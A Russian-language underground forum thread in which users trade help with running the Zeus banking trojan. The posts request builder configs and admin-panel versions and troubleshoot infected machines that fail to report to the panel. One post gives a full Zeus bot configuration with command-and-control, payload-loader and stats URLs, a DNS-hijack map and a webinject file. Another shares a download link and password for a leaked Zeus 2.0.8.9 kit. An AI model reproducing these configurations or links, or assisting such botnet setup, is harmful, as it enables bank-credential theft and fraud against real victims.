malware Zeus trojan.

[unauthorized]

У кого есть конфиг билдера для Зевс 2?

 

[keps]

какая публика версия не бэкдор и работает с windows 7?

 

[Ph1exon]

Странная трабла. Ставится всё с полпинка, и админка и билдю вкайф. Заражаю машину, а админка не видит ничего, нет ни одного бота ни с локали, ни с платного хоста. Подскажите конкретно, плз, пиво с меня.

winXP, билдер 1.2.7.19, админка 1.2.10.1

 

[keps]

что вы можете дать Зевса 2.0.8.9 aдминка?

 

[R0aCh]

Какая последняя версия Зевс? Кто знает?

 

[fi4]

Странная трабла. Ставится всё с полпинка, и админка и билдю вкайф. Заражаю машину, а админка не видит ничего, нет ни одного бота ни с локали, ни с платного хоста. Подскажите конкретно, плз, пиво с меня.

winXP, билдер 1.2.7.19, админка 1.2.10.1

Решил как-нибудь? У меня та же самая проблема :bang:

Админка 1.2.10.1 стоит на локалхосте, пробовал билдить с помощью 1.2.7.11 от сс и 1.3.1.1 от b1sh0p, конфиг следующий:

entry "StaticConfig"
botnet "ewqqq"
timer_config 720 120
timer_logs 30 10
timer_stats 30 20
url_config "http://zes.ru/cfg.bin"
url_compip "http://zes.ru/ip.php" 64
encryption_key "qqqwe"
end

entry "DynamicConfig"
url_loader "http://zes.ru/lsass.exe"
url_server "http://zes.ru/stat.php"
file_webinjects "webinjects.txt"

entry "AdvancedConfigs"
end

entry "WebFilters"
end

entry "WebDataFilters"
end

entry "WebFakes"
end

entry "DnsMap"
127.0.0.1 microsoft.com
end
end

файл инжектов такой:

set_url http://* PG
data_before
<title>
data_end
data_inject
WORKING!!!
data_end
data_after
</title>
data_end

Запускаю exe - в админку не отстукивает, DnsMap в hosts не добавляется, инжекты не работают. Билдер при повторном запуске пишет "Spyware not founded on this system".

Дело происходит на виртуалке (VMware 7.1.2 build 301548), ОС Windows XP Professional 32bit без SP (конкретно - эта: http://rutracker.org/forum/viewtopic.php?t=3175942 )

Подскажите, что делать, в каком направлении копать?

 

[fi4]

Все оказалось просто, поставил XP SP3 и заработало

 

[NuTraL]

gf

 

[Beaten_Sect0r]

Zeus 2.0.8.9 выпал в паблиц (сам не запускал вообще).

Спойлер: 50

http://www.sendspace.com/file/gr0c9d
Password: publicenemy

 

[Pfirter]

Да, уже 2-е выложили, на днях сказали будет с модулями, не вижу хайд, но видел откуда ноги растут. А ещё он собирается сорцы выложить в АВ компании. Вот это будет пистец

 

[greenzy]

откуда произошла утечка?

 

[Pfirter]

кбиз вериф

 

[Beaten_Sect0r]

тему видел на ксу и воре.

 

[greenzy]

дайте ссылки на темы

 

[SilverT]

Ну попадут сорцы в ав компании...и чо?

 

[karabas-barabas]

я бы не отказался глянуть на сорцы

 

[Pfirter]

ну попадут сорцы всё, пиздец будет, палится будет и с криптом, распознавание сигнатуры будет

А на верифе снесли тему

 

[SilverT]

karabas-barabas
Возьмите ИДУ и ХексРэйс и любуйтесь на здоровье
Pfirter
Товагисч, не хочу грубить, но я бы предложил вам лечиться.
Антивиоусные оналитики имеют дизассемблеры и видят сорцы, прикинь, лни у них ЕСТЬ! =) А утверждение, "ну попадут сорцы всё, пиздец будет, палится будет и с криптом, распознавание сигнатуры будет" просто повернуло мне моск на 180 градусов в черепной коробке =)))

 

[Pfirter]

Ну так а что тогда бояться если сорцы им в руки попадут то, самое страшное тогда это то что билдер будет в паблике и каждый себе будет ебенить билды, и разведётся куча ботнетчиков

 

[karabas-barabas]

Возьмите ИДУ и ХексРэйс и любуйтесь на здоровье

не вариант, это небо и земля , ну по крайней мере я еще не настолько постиг дао программинга чтобы читать дизасм листинг как газету.

Ну так а что тогда бояться если сорцы им в руки попадут то, самое страшное тогда это то что билдер будет в паблике и каждый себе будет ебенить билды, и разведётся куча ботнетчиков

а вот с этим согласен

Публичное распространение банковких троянов => увеличение фрауда => ужесточение систем защиты банков.